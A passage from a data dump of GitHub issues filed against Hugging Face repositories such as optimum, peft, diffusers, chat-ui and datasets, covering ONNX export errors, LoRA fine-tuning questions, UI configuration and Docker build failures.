([https://github.com/neuml/txtai/blob/master/examples/18_Export_and_run_models_with_ONNX.ipynb])\r\n\r\n```\r\nonnx = HFOnnx()\r\nembeddings = onnx(\"sentence-transformers/paraphrase-MiniLM-L6-v2\", \"pooling\", \"embeddings.onnx\", quantize=True)\r\n\r\n```\r\n\r\nOr. does this needs to be done somehow after the ONNX model is generated (post-processing)? \n\n### Expected behavior\n\nSupport for pooling in optimum_cli ", "url": "https://github.com/huggingface/optimum/issues/1145", "state": "open", "labels": [ "bug" ], "created_at": "2023-06-29T05:57:35Z", "updated_at": "2023-06-29T05:57:35Z", "user": "aunwesha" }, { "repo": "huggingface/chat-ui", "number": 328, "title": "Is there a way to see all of a user's history?", "body": "I want to see the chat history of all my users. ", "url": "https://github.com/huggingface/chat-ui/issues/328", "state": "closed", "labels": [ "question" ], "created_at": "2023-06-29T05:01:55Z", "updated_at": "2023-07-03T10:43:53Z", "user": "ildoonet" }, { "repo": "huggingface/chat-ui", "number": 327, "title": "Tokens limits issue", "body": "Input validation error: `inputs` tokens + `max_new_tokens` must be <= 1512. Given: 603 `inputs tokens and 1024 `max_new_tokens\r\n\r\nWhen deployed, the ui is working fine for like 2 or 3 promts, then every prompt we try we get a red line on top with a pop-up having this message. Please how can we remove this limitation on the code?\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/327", "state": "open", "labels": [ "question", "back" ], "created_at": "2023-06-28T18:09:19Z", "updated_at": "2023-09-18T14:03:59Z", "user": "Billyroot" }, { "repo": "huggingface/diffusers", "number": 3890, "title": "How to apply the schedulers in diffusers to original SD", "body": "Hi! Thanks for this great work! Diffusers helps me a lot in many aspects!\r\n\r\nBecause of my recent work, I would like to know wether the schedulers in diffusers can be directly used in original SD? If yes, what should I do? \r\n\r\nAny response will be greatly appreciated! Again, thank you all for this convenient framework!", "url": "https://github.com/huggingface/diffusers/issues/3890", "state": "closed", "labels": [ "stale" ], "created_at": "2023-06-28T11:02:41Z", "updated_at": "2023-08-05T15:04:00Z", "user": "volcverse" }, { "repo": "huggingface/dataset-viewer", "number": 1446, "title": "Add fields `viewer` and `preview` to /is-valid", "body": "For coherence with /valid, we should add the `viewer` and `preview` fields to /is-valid.\r\n\r\nWe should also consider deprecating the current `valid` field (as in https://github.com/huggingface/datasets-server/issues/1445). Note that it's in use in https://github.com/search?q=org%3Ahuggingface+datasets-server.huggingface.co+repo%3Ahuggingface%2Fnotebooks&type=code and also in the @lewtun's evaluator if I remember correctly.", "url": "https://github.com/huggingface/dataset-viewer/issues/1446", "state": "closed", "labels": [ "question", "api" ], "created_at": "2023-06-28T09:19:56Z", "updated_at": "2023-06-29T14:13:16Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 1445, "title": "Remove `.valid` from `/valid` endpoint?", "body": "We recently added to fields to `/valid`:\r\n- `viewer`: all the datasets that have a valid dataset viewer\r\n- `preview`: all the datasets that don't have a valid dataset viewer, but have a dataset preview\r\n\r\nAnd the Hub does not use the original field `valid` anymore. We still fill it with the union of both sets.\r\n\r\nShould we remove it, as it doubles the size of the response and increases the response time, with no benefit? cc @huggingface/datasets-server \r\n\r\nNote that it's used in the notebooks (https://github.com/search?q=org%3Ahuggingface+datasets-server.huggingface.co+repo%3Ahuggingface%2Fnotebooks&type=code), for example, so it is a breaking change.\r\n\r\nI would vote in favor of removing it, and updating the notebooks (and the docs obviously).", "url": "https://github.com/huggingface/dataset-viewer/issues/1445", "state": "closed", "labels": [ "question", "api" ], "created_at": "2023-06-28T09:17:13Z", "updated_at": "2023-07-26T15:47:35Z", "user": "severo" }, { "repo": "huggingface/diffusers", "number": 3882, "title": "How to use models like chilloutmix to do inpainting task?", "body": "I tried as https://huggingface.co/docs/diffusers/api/diffusion_pipeline mentioned:\r\n`text2img = StableDiffusionPipeline.from_pretrained(\"/data/cx/ysp/aigc-smart-painter/models/chilloutmix_NiPrunedFp32Fix\")\r\ninpaint = StableDiffusionInpaintPipeline(**text2img.components)\r\nseger = RawSeger()\r\nREST_API_URL = 'http://localhost:9900/sd/inpaint'\r\npainter = GridPainter()\r\nimg_path = \"/data/cx/ysp/aigc-smart-painter/assets/cloth1.jpg\"\r\nimage = Image.open(img_path)\r\nbox = [220, 20, 500, 320]\r\nnew_image = draw_box(np.array(image), cords=box, color=(255, 0, 0), thickness=2)\r\nshow_image(new_image)\r\nmask = seger.prompt_with_box(image, box=box, reverse=False)\r\nmask = Image.fromarray(mask)\r\nshow_image(mask)\r\nend = time.time()\r\nprompt = \"best quality,symmetry realistic,real life,photography,masterpiece,8K,HDR,highres,1 gril, looking at viewer\"\r\nimages = inpaint(prompt=prompt, image=image, mask_image=mask, num_images_per_prompt=1,\r\n num_inference_steps=50, guidance_scale=7.5,)\r\n\r\npainter.image_grid(images, rows=1, cols=len(images) // 1)\r\npainter.image_show()\r\nprint(\"finished\")`\r\n\r\nI got this error:\r\nexpects 4 but received `num_channels_latents`: 4 + `num_channels_mask`: 1 + \r\n`num_channels_masked_image`: 4 = 9. Please verify the config of `pipeline.unet` \r\nor your `mask_image` or `image` input.\r\n\r\nProcess finished with exit code 1\r\n\r\nHow can I convert model like chilloutmix to do inpainting task?\r\nThank you !\r\n", "url": "https://github.com/huggingface/diffusers/issues/3882", "state": "closed", "labels": [ "stale" ], "created_at": "2023-06-27T15:25:31Z", "updated_at": "2023-08-05T15:04:07Z", "user": "AdamMayor2018" }, { "repo": "huggingface/diffusers", "number": 3881, "title": "How many images and how many epochs are required to fine tune LORA for stable diffusion on custom image dataset", "body": "I am trying to finetune LORA on a movie dataset , but I am using custom dataset which has 3-4 movie characters , instead of using the actual names of the actor we are using in movie name of the characters , how big the dataset would be required in terms of total number of images, and number of images per character and how many epochs would be required to fine tune this LORA model .\r\nPS: I have already tried fine tuning with 200 images of a single character for 100,250 and 500 Epochs but the results are very bad , can anyone please provide some suggestion @patrickvonplaten @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/3881", "state": "closed", "labels": [ "stale" ], "created_at": "2023-06-27T11:05:53Z", "updated_at": "2023-08-04T15:03:17Z", "user": "atharmzaalo2023" }, { "repo": "huggingface/peft", "number": 636, "title": "How to save full model weights and not just the adapters ?", "body": "### System Info\n\npeft==0.4.0.dev0\r\n\r\nI'm not sure if this should be a bug report, so sorry if this is not convenient. \r\nAccording to the `save_pretrained`method docstring, this saves the adapter model only and not the full model weights, is there an option where I can save the full model weights ? The use case is that we want to upload the full model to hf to be able to activate the inference API, however now we only save adapter weights \n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nsave_pretrained saves only adapters, maybe also add the option to save the full model \n\n### Expected behavior\n\nsave_pretrained saves only adapters, maybe also add the option to save the full model ", "url": "https://github.com/huggingface/peft/issues/636", "state": "closed", "labels": [], "created_at": "2023-06-26T15:30:48Z", "updated_at": "2025-03-13T11:52:23Z", "user": "azayz" }, { "repo": "huggingface/peft", "number": 631, "title": "How to train multiple LoRAs at once?", "body": "Hi! I would like to train multiple LoRAs at once (for some reason). Although `requires_grad` is True for all LoRA weight matrices, only the first LoRA weight matrix will calculate the gradient, and the others will not calculate the gradient - and will not be updated. How can I train them in one forward process?\r\n\r\n1. I initialize multiple LoRAs using the `add_adapter()` method\r\n```python\r\nbert_path = \"prajjwal1/bert-tiny\"\r\nrank = 8\r\nLoRA_amount = 6\r\n\r\nmodel = CustomBert.from_pretrained(bert_path)\r\npeft_config = LoraConfig(\r\n inference_mode=False, \r\n r=rank, \r\n lora_alpha=32, \r\n lora_dropout=0.1\r\n)\r\nmodel = PeftModel(model, peft_config, adapter_name=\"0\")\r\nfor LoRA_index in range(1, LoRA_amount):\r\n model.add_adapter(str(LoRA_index), peft_config)\r\n```\r\n2. This is the printed model architecture\r\n```\r\ntestModel(\r\n (model): PeftModel(\r\n (base_model): LoraModel(\r\n (model): CustomBert(\r\n (bert): BertModel(\r\n (embeddings): BertEmbeddings(\r\n (word_embeddings): Embedding(30522, 128, padding_idx=0)\r\n (position_embeddings): Embedding(512, 128)\r\n (token_type_embeddings): Embedding(2, 128)\r\n (LayerNorm): LayerNorm((128,), eps=1e-12, elementwise_affine=True)\r\n (dropout): Dropout(p=0.1, inplace=False)\r\n )\r\n (encoder): BertEncoder(\r\n (layer): ModuleList(\r\n (0): BertLayer(\r\n (attention): BertAttention(\r\n (self): BertSelfAttention(\r\n (query): Linear(\r\n in_features=128, out_features=128, bias=True\r\n (lora_dropout): ModuleDict(\r\n (0): Dropout(p=0.1, inplace=False)\r\n (1): Dropout(p=0.1, inplace=False)\r\n (2): Dropout(p=0.1, inplace=False)\r\n (3): Dropout(p=0.1, inplace=False)\r\n (4): Dropout(p=0.1, inplace=False)\r\n (5): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (0): Linear(in_features=128, out_features=16, bias=False)\r\n (1): Linear(in_features=128, out_features=16, bias=False)\r\n (2): Linear(in_features=128, out_features=16, bias=False)\r\n (3): Linear(in_features=128, out_features=16, bias=False)\r\n (4): Linear(in_features=128, out_features=16, bias=False)\r\n (5): Linear(in_features=128, out_features=16, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (0): Linear(in_features=16, out_features=128, bias=False)\r\n (1): Linear(in_features=16, out_features=128, bias=False)\r\n (2): Linear(in_features=16, out_features=128, bias=False)\r\n (3): Linear(in_features=16, out_features=128, bias=False)\r\n (4): Linear(in_features=16, out_features=128, bias=False)\r\n (5): Linear(in_features=16, out_features=128, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n )\r\n (key): Linear(in_features=128, out_features=128, bias=True)\r\n (value): Linear(\r\n in_features=128, out_features=128, bias=True\r\n (lora_dropout): ModuleDict(\r\n (0): Dropout(p=0.1, inplace=False)\r\n (1): Dropout(p=0.1, inplace=False)\r\n (2): Dropout(p=0.1, inplace=False)\r\n (3): Dropout(p=0.1, inplace=False)\r\n (4): Dropout(p=0.1, inplace=False)\r\n (5): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (0): Linear(in_features=128, out_features=16, bias=False)\r\n (1): Linear(in_features=128, out_features=16, bias=False)\r\n (2): Linear(in_features=128, out_features=16, bias=False)\r\n (3): Linear(in_features=128, out_features=16, bias=False)\r\n (4): Linear(in_features=128, out_features=16, bias=False)\r\n (5): Linear(in_features=128, out_features=16, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (0): Linear(in_features=16, out_features=128, bias=False)\r\n (1): Linear(in_features=16, out_features=128, bias=False)\r\n (2): Linear(in_features=16, out_features=128, bias=False)\r\n (3): Linear(in_features=16, out_features=128, bias=False)\r\n (4): Linear(in_features=16, out_features=128, bias=False)\r\n (5", "url": "https://github.com/huggingface/peft/issues/631", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-06-26T09:30:16Z", "updated_at": "2023-08-18T13:41:32Z", "user": "meteorlin" }, { "repo": "huggingface/optimum", "number": 1135, "title": "Donut document parsing export to onnx does not work.", "body": "### System Info\n\n```shell\noptimum==1.8.8\r\npython==3.11.3\r\nsystem linux\n```\n\n\n### Who can help?\n\nThe donut export does not work with the following commands, does anybody know how to get this running or know about the status.\r\n\r\n```\r\noptimum-cli export onnx -m naver-clova-ix/donut-base-finetuned-cord-v2 donut_cord2_onnx/\r\n...\r\n...\r\n...\r\nException: The post-processing of the ONNX export failed. The export can still be performed by passing the option --no-post-process. Detailed error: Unable to merge decoders. Detailed error: Expected \r\na dynamic shape for the axis zero of onnx::Reshape_1045, found a static shape: 2\r\n```\r\n````\r\noptimum-cli export onnx -m naver-clova-ix/donut-base-finetuned-cord-v2 donut_cord2_onnx/ --no-post-process\r\n...\r\n...\r\n...\r\n- last_hidden_state: max diff = 0.0012216567993164062\r\nValidation 1 for the model donut_cord2_onnx/decoder_model.onnx raised: The exported ONNX model does not have the exact same outputs as what is provided in VisionEncoderDecoderOnnxConfig. Difference: onnx::Reshape_1263, onnx::Reshape_1359, onnx::Reshape_1364, onnx::Reshape_1045, onnx::Reshape_1146, onnx::Reshape_1258, onnx::Reshape_1151, onnx::Reshape_1050\r\nonnxruntime.capi.onnxruntime_pybind11_state.InvalidArgument: [ONNXRuntimeError] : 2 : INVALID_ARGUMENT : Invalid Feed Input Name:encoder_hidden_states\r\nAn error occured during validation, but the model was saved nonetheless at donut_cord2_onnx. Detailed error: [ONNXRuntimeError] : 2 : INVALID_ARGUMENT : Invalid Feed Input Name:encoder_hidden_states.\r\n```\r\n\r\nChanging the task name to image-to-text instead of image-to-text-with-past does seem to run. However, I assume that this task is set specifically. Although, for me it is unclear why it is set to that particular task.\r\n\r\n```\r\noptimum-cli export onnx -m naver-clova-ix/donut-base-finetuned-cord-v2 donut_cord2_onnx/ --no-post-process --task image-to-text\r\nValidating ONNX model donut_cord2_onnx/encoder_model.onnx...\r\n -[\u2713] ONNX model output names match reference model (last_hidden_state)\r\n - Validating ONNX Model output \"last_hidden_state\":\r\n -[\u2713] (2, 1200, 1024) matches (2, 1200, 1024)\r\n -[x] values not close enough, max diff: 0.00121307373046875 (atol: 0.001)\r\nValidating ONNX model donut_cord2_onnx/decoder_model.onnx...\r\nValidation 0 for the model donut_cord2_onnx/encoder_model.onnx raised: The maximum absolute difference between the output of the reference model and the ONNX exported model is not within the set tolerance 0.001:\r\n- last_hidden_state: max diff = 0.00121307373046875\r\nThe ONNX export succeeded with the warning: The exported ONNX model does not have the exact same outputs as what is provided in VisionEncoderDecoderOnnxConfig. Difference: onnx::Reshape_1359, onnx::Reshape_1258, onnx::Reshape_1146, onnx::Reshape_1151, onnx::Reshape_1050, onnx::Reshape_1045, onnx::Reshape_1364, onnx::Reshape_1263.\r\n The exported model was saved at: donut_cord2_onnx\r\n```\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\noptimum-cli export onnx -m naver-clova-ix/donut-base-finetuned-cord-v2 donut_cord2_onnx/\r\n\r\n\n\n### Expected behavior\n\nexport to run correctly and validation report.", "url": "https://github.com/huggingface/optimum/issues/1135", "state": "closed", "labels": [ "bug" ], "created_at": "2023-06-26T08:57:01Z", "updated_at": "2023-06-26T10:17:32Z", "comments": 3, "user": "casperthuis" }, { "repo": "huggingface/peft", "number": 630, "title": "How to switch to P-Tuning v2", "body": "We can find the `P-Tuning v2` in \r\nhttps://github.com/huggingface/peft/blob/8af8dbd2ec9b4b8f664541e9625f898db7c7c78f/README.md?plain=1#L29\r\nBut how can I switch to `P-Tuning v2`?", "url": "https://github.com/huggingface/peft/issues/630", "state": "closed", "labels": [ "solved" ], "created_at": "2023-06-26T08:52:42Z", "updated_at": "2023-08-04T15:03:30Z", "user": "jiahuanluo" }, { "repo": "huggingface/optimum", "number": 1134, "title": "ValueError: ..set the option `trust_remote_code=True` to remove this error", "body": "### System Info\n\n```shell\n- `optimum` version: 1.8.8\r\n- `transformers` version: 4.30.2\r\n- Platform: Windows-10-10.0.19045-SP0\r\n- Python version: 3.11.3\r\n- Huggingface_hub version: 0.15.1\r\n- PyTorch version (GPU?): 2.0.1+cpu (cuda availabe: False)\r\n- Tensorflow version (GPU?): not installed (cuda availabe: NA)\n```\n\n\n### Who can help?\n\nHello,\r\n\r\nI am running the optimum cli command \r\n\r\n`optimum-cli export onnx --model mosaicml/mpt-7b-chat --task text-generation mpt-7b-chat\\`\r\n\r\nwhen I am getting this error:\r\n\r\n```\r\nFile \"C:\\Users\\dutta\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\transformers\\dynamic_module_utils.py\", line 553, in resolve_trust_remote_code\r\n raise ValueError(\r\nValueError: Loading mosaicml/mpt-7b-chat requires you to execute the configuration file in that repo on your local machine. Make sure you have read the code there to avoid malicious use, then set the option `trust_remote_code=True` to remove this error.\r\n```\r\n\r\nHow to deal with this error? @michaelbenayoun\r\n\r\nThanks\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nRun the same command replacing the output directory name to a name of your choice\n\n### Expected behavior\n\nI expect the command to run without error and product the ONNX model and other files in the output directory", "url": "https://github.com/huggingface/optimum/issues/1134", "state": "closed", "labels": [ "bug" ], "created_at": "2023-06-24T12:47:35Z", "updated_at": "2023-07-06T16:38:30Z", "comments": 5, "user": "diptenduLF" }, { "repo": "huggingface/chat-ui", "number": 322, "title": "Chat using WizardCoder", "body": "Hello,\r\nCan you please post an example of .env.local for:\r\nWizardLM/WizardCoder-15B-V1.0", "url": "https://github.com/huggingface/chat-ui/issues/322", "state": "open", "labels": [], "created_at": "2023-06-23T18:44:07Z", "updated_at": "2023-08-14T20:52:39Z", "comments": 2, "user": "vitalyshalumov" }, { "repo": "huggingface/chat-ui", "number": 321, "title": "Chat-UI not loading Tailwind colors. ", "body": "**Problem**\r\n\r\nWhen specifying `PUBLIC_APP_COLOR` in either the `.env` or the `.env.local` file, the chat-UI color does not change regardless of which color is used. Even when `PUBLIC_APP_COLOR=blue` as set in this repository, the chat-UI color does not match with TailwindCSS's blue color palette: \r\n\r\n**TailwindCSS blue color palette:**\r\n\"blue\"\r\n\r\n**Chat-UI color palette:**\r\n\"chat\"\r\n\r\n**Observation**\r\nUpon investigating the code, I noticed that the switchTheme.ts file contains the following code:\r\n```\r\nexport function switchTheme() {\r\n\tconst { classList } = document.querySelector(\"html\") as HTMLElement;\r\n\tif (classList.contains(\"dark\")) {\r\n\t\tclassList.remove(\"dark\");\r\n\t\tlocalStorage.theme = \"light\";\r\n\t} else {\r\n\t\tclassList.add(\"dark\");\r\n\t\tlocalStorage.theme = \"dark\";\r\n\t}\r\n}\r\n```\r\n\r\nI think that instead of loading the Tailwind colors specified in either `.env` or `.env.local`, the chat-UI is actually using these `\"light\"` and `\"dark\"` themes. I couldn't find where these themes are specified in the repositories or if they can be changed at all. \r\n\r\n**Requested Solution:**\r\nI want to load the Tailwind colors by setting `PUBLIC_APP_COLOR` in `.env` and/or `.env.local`. However, if it turns out that the chat-UI laods colors based on the `\"light\"` and `\"dark\"`, adjusting these themes could also be a viable solution. Thank you in advance for your assistance. ", "url": "https://github.com/huggingface/chat-ui/issues/321", "state": "closed", "labels": [ "question", "front" ], "created_at": "2023-06-23T15:54:43Z", "updated_at": "2023-09-18T13:12:15Z", "user": "ckanaar" }, { "repo": "huggingface/peft", "number": 622, "title": "LoRA results in 4-6% lower performance compared to full fine-tuning", "body": "I am working on fine-tuning LLMs (6B to 40B parameters) using the LoRA framework on an instruction tuning dataset comprising of instructions corresponding to ~20 tasks (a mix of factual as well as open-ended tasks). The input to the model consists of a conversation snippet between two individuals along with a task-specific prompt. The results I am observing do not align with the performance improvements reported in the [paper](https://arxiv.org/pdf/2106.09685.pdf). Specifically, the paper reports that fine-tuning using LoRA generally results in performance at par with or better than full fine-tuning of the model, however, throughout our experiments I observe a performance lower than full fine-tuning by an absolute margin of ~4-6% in terms of RougeL score. \r\n\r\nSharing some of the training details below:\r\n\r\n**[Framework versions]**\r\nPython: 3.8\r\nPyTorch: 1.13.1 \r\nTransformers: 4.27.4\r\nPEFT: 0.3.0\r\n\r\n**[Infrastructure]**\r\n8 X A100 40 GB GPUs \r\n\r\n**[Hyper-parameter Range]**\r\nLearning rate: 5e-5 to 3e-3\r\nLearning rate scheduler: [Constant, Linear]\r\nEpochs: [1, 2]\r\nBatch size: [2, 4, 8]\r\nWeight decay: 0.0\r\nPrecision: bf16\r\n\r\nSpecifically, I tried fine-tuning of `google/flan-t5-xxl` model in following two scenarios:\r\n\r\n- **Scenario 1**\r\nFull fine-tuning with constant `learning rate = 5e-5`, `batch size = 8`, `epochs = 1`\r\n\r\n- **Scenario 2**\r\nFine-tuning using LoRA with constant `learning rate = 1e-3`, `batch size = 8`, `epochs = 1` and LoraConfig as follows:\r\n`LoraConfig(r=8, lora_alpha=16, lora_dropout=0.05, bias='none', task_type=\"SEQ_2_SEQ_LM\")`\r\n\r\n**Observation:** Scenario 2 resulted in 4% lower RougeL as compared to scenario 1. I have also tried tuning the hyper-parameters in Scenario 2 as per the range specified above, however, the best I could get is to a gap of ~4% RougeL.\r\n\r\nThank you very much for your time and consideration. Looking forward to any relevant insights here.", "url": "https://github.com/huggingface/peft/issues/622", "state": "closed", "labels": [ "question" ], "created_at": "2023-06-23T10:50:24Z", "updated_at": "2023-07-24T12:12:18Z", "user": "digvijayingle016" }, { "repo": "huggingface/setfit", "number": 389, "title": "gradient_accumulation", "body": "Is there a way in setFitTrainer to change the gradient_accumulation like you can do in the regular Trainer class in TrainingArguments? Also just in general I am looking for tips to make training faster.", "url": "https://github.com/huggingface/setfit/issues/389", "state": "closed", "labels": [ "question" ], "created_at": "2023-06-22T21:18:37Z", "updated_at": "2023-11-11T05:32:34Z", "user": "zackduitz" }, { "repo": "huggingface/datasets", "number": 5982, "title": "404 on Datasets Documentation Page", "body": "### Describe the bug\n\nGetting a 404 from the Hugging Face Datasets docs page:\r\nhttps://huggingface.co/docs/datasets/index\r\n\n\n### Steps to reproduce the bug\n\n1. Go to URL https://huggingface.co/docs/datasets/index\r\n2. Notice 404 not found\n\n### Expected behavior\n\nURL should either show docs or redirect to new location\n\n### Environment info\n\nhugginface.co", "url": "https://github.com/huggingface/datasets/issues/5982", "state": "closed", "labels": [], "created_at": "2023-06-22T20:14:57Z", "updated_at": "2023-06-26T15:45:03Z", "comments": 2, "user": "kmulka-bloomberg" }, { "repo": "huggingface/chat-ui", "number": 317, "title": "Issues when trying to deploy on cPanel (shared hosting)", "body": "Hello there, \r\n\r\nIs there something special to do to be able to deploy chat-ui on a shared hosting using cPanel? \r\n\r\nI tried using the Node.JS Apps Manager as follows\r\n![cpanel](https://github.com/huggingface/chat-ui/assets/109650634/fac1abfd-000a-4dde-bf38-54427b12889c)\r\n\r\nBut even when switching my entry point to server/index.js, it doesn't work. \r\n\r\nI also tried to NPM install using the manager, but then it doesn't seem to be able to use vite, even when forcing any `npm install vite`... \r\n\r\nSo, if you could me out on this, it would be highly appreciated! \r\n\r\nIn advance, thanks a lot. \r\n\r\nRegards, \r\n\r\nGollum\u00e9o", "url": "https://github.com/huggingface/chat-ui/issues/317", "state": "closed", "labels": [ "support" ], "created_at": "2023-06-22T17:32:00Z", "updated_at": "2023-09-18T13:12:53Z", "comments": 1, "user": "gollumeo" }, { "repo": "huggingface/transformers.js", "number": 161, "title": "[Question] whisper vs. ort-wasm-simd-threaded.wasm", "body": "While looking into https://cdn.jsdelivr.net/npm/@xenova/transformers@2.2.0/dist/transformers.js I can see a reference to **ort-wasm-simd-threaded.wasm** however that one never seem to be loaded for whisper/automatic-speech-recognition ( https://huggingface.co/spaces/Xenova/whisper-web ) while it always use **ort-wasm-simd.wasm** . I wonder if there is a way to enable or enforce threaded wasm and so improve transcription speed?", "url": "https://github.com/huggingface/transformers.js/issues/161", "state": "open", "labels": [ "question" ], "created_at": "2023-06-22T06:41:31Z", "updated_at": "2023-08-15T16:36:01Z", "user": "jozefchutka" }, { "repo": "huggingface/datasets", "number": 5975, "title": "Streaming Dataset behind Proxy - FileNotFoundError", "body": "### Describe the bug\r\n\r\nWhen trying to stream a dataset i get the following error after a few minutes of waiting.\r\n\r\n```\r\nFileNotFoundError: https://huggingface.co/datasets/facebook/voxpopuli/resolve/main/data/n_files.json\r\nIf the repo is private or gated, make sure to log in with `huggingface-cli login`.\r\n```\r\n\r\nI have already set the proxy environment variables. Downloading a Dataset without streaming works as expected.\r\nStill i suspect that this is connected to being behind a proxy.\r\n\r\nIs there a way to set the proxy for streaming datasets? Possibly a keyword argument that gets passed to ffspec?\r\n\r\n### Steps to reproduce the bug\r\n\r\nThis is the code i use.\r\n\r\n```\r\nimport os\r\nos.environ['http_proxy'] = \"http://example.com:xxxx\" \r\nos.environ['https_proxy'] = \"http://example.com:xxxx\" \r\n\r\n\r\nfrom datasets import load_dataset\r\n\r\nds = load_dataset(\"facebook/voxpopuli\", name=\"de\", streaming=True)\r\n```\r\n\r\n### Expected behavior\r\n\r\nI would expect the streaming functionality to use the set proxy settings.\r\n\r\n### Environment info\r\n\r\n\r\n- `datasets` version: 2.13.0\r\n- Platform: Linux-5.15.0-73-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.11\r\n- Huggingface_hub version: 0.15.1\r\n- PyArrow version: 11.0.0\r\n- Pandas version: 2.0.2\r\n", "url": "https://github.com/huggingface/datasets/issues/5975", "state": "closed", "labels": [], "created_at": "2023-06-21T19:10:02Z", "updated_at": "2023-06-30T05:55:39Z", "comments": 9, "user": "Veluchs" }, { "repo": "huggingface/transformers.js", "number": 158, "title": "[Question] How do I use this library with ts-node?", "body": "I have a non-Web/browser-based project that uses TypeScript with ts-node. \r\n\r\nThe \"pipeline\" function attempts to use the JavaScript Fetch API, which is not included with NodeJS, and the code therefore fails with an error: \"fetch is not defined.\"\r\n\r\nThe \"node-fetch\" package doesn't seem to provide a compatible API. \r\n", "url": "https://github.com/huggingface/transformers.js/issues/158", "state": "open", "labels": [ "question" ], "created_at": "2023-06-21T17:42:11Z", "updated_at": "2023-08-17T13:20:51Z", "user": "moonman239" }, { "repo": "huggingface/chat-ui", "number": 314, "title": "500 Internal Error", "body": "![image](https://github.com/huggingface/chat-ui/assets/81065703/33c28e7b-584b-48e3-a64c-b4d5271a325f)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/314", "state": "closed", "labels": [ "question", "support" ], "created_at": "2023-06-21T08:58:52Z", "updated_at": "2023-06-22T13:13:57Z", "user": "kasinadhsarma" }, { "repo": "huggingface/datasets", "number": 5971, "title": "Docs: make \"repository structure\" easier to find", "body": "The page https://huggingface.co/docs/datasets/repository_structure explains how to create a simple repository structure without a dataset script.\r\nIt's the simplest way to create a dataset and should be easier to find, particularly on the docs' first pages.", "url": "https://github.com/huggingface/datasets/issues/5971", "state": "open", "labels": [ "documentation" ], "created_at": "2023-06-21T08:26:44Z", "updated_at": "2023-07-05T06:51:38Z", "comments": 5, "user": "severo" }, { "repo": "huggingface/chat-ui", "number": 313, "title": "MongoDB", "body": "I have a free teir MongoDB acount but not sure how to get url plz help", "url": "https://github.com/huggingface/chat-ui/issues/313", "state": "closed", "labels": [ "support" ], "created_at": "2023-06-21T07:47:18Z", "updated_at": "2023-06-23T08:34:42Z", "comments": 5, "user": "Toaster496" }, { "repo": "huggingface/peft", "number": 607, "title": "trainer with multi-gpu", "body": "I want to use trainer.predict to predict datasets by multi-gpu, but actually I only use single one gpu\r\nwhen I print Seq2SeqTrainingArguments , I get \r\n![image](https://github.com/huggingface/peft/assets/2166948/c34b25a7-670a-411a-ab85-23910b98cb92)\r\nIt shows 8 gpu\r\n\r\nI check my code, when I load model, I find something strange\r\nbase_model.device: cpu\r\npeftModel is as follows:\r\n![image](https://github.com/huggingface/peft/assets/2166948/cb30b422-7519-4a76-ba32-fa25afc9d720)\r\nit print cuda\r\n\r\nhow can i fix?\r\n\r\n", "url": "https://github.com/huggingface/peft/issues/607", "state": "closed", "labels": [ "question" ], "created_at": "2023-06-20T08:58:37Z", "updated_at": "2023-07-28T15:03:31Z", "user": "hrdxwandg" }, { "repo": "huggingface/chat-ui", "number": 311, "title": "Unable to build with Docker ", "body": "Hey, \r\nI'm trying to create a docker container with Chat-Ui but i'm facing a wall. \r\nI cloned this repo in a folder on a server and modified the `.env` file, thinking that it would be easy to deploy a docker container out of it but I could not be more wrong ! \r\nAfter trying to build my container with `docker build -t chat-ui .` I went to the same problem as [here](https://github.com/huggingface/chat-ui/issues/301). \r\n\r\nI tried to build the docker container before and after running `npm install` but I went through the exact same problem, which is that it cannot run in the Dockerfile :\r\n```\r\nRUN --mount=type=secret,id=DOTENV_LOCAL,dst=.env.local \\ \r\n npm run build\r\n```\r\n\r\nAt first I thought it was an issue with docker not being able to run` npm install` so I added, at the begining of my dockerfile `CMD npm install` and went also throughout the same issue, I'm guessing it has something to do with the dockerfile itself. \r\n\r\n\r\nTo reproduce my error, here are the steps :\r\n\r\n1. `git clone https://github.com/huggingface/chat-ui.git`\r\n2. `cp .env .env.local `\r\n3. modify my .env.local with my variables\r\n4. `docker build -t chat-ui .`\r\n\r\nHere is the error I'm getting when I launch the docker build command :\r\n\r\n```\r\ndocker build -t chat-ui .\r\n[+] Building 4.3s (16/17) \r\n => [internal] load .dockerignore 0.0s\r\n => => transferring context: 122B 0.0s\r\n => [internal] load build definition from Dockerfile 0.0s\r\n => => transferring dockerfile: 954B 0.0s\r\n => [internal] load metadata for docker.io/library/node:19 0.6s\r\n => [internal] load metadata for docker.io/library/node:19-slim 0.6s\r\n => [builder-production 1/4] FROM docker.io/library/node:19@sha256:92f06f 0.0s\r\n => [internal] load build context 0.0s\r\n => => transferring context: 10.45kB 0.0s\r\n => [stage-2 1/5] FROM docker.io/library/node:19-slim@sha256:f58f1fcf5c9f 0.0s\r\n => CACHED [builder-production 2/4] WORKDIR /app 0.0s\r\n => CACHED [builder-production 3/4] COPY --link --chown=1000 package-lock 0.0s\r\n => CACHED [builder-production 4/4] RUN --mount=type=cache,target=/app/.n 0.0s\r\n => CACHED [builder 1/3] RUN --mount=type=cache,target=/app/.npm 0.0s\r\n => CACHED [builder 2/3] COPY --link --chown=1000 . . 0.0s\r\n => CACHED [stage-2 2/5] RUN npm install -g pm2 0.0s\r\n => CACHED [stage-2 3/5] COPY --from=builder-production /app/node_modules 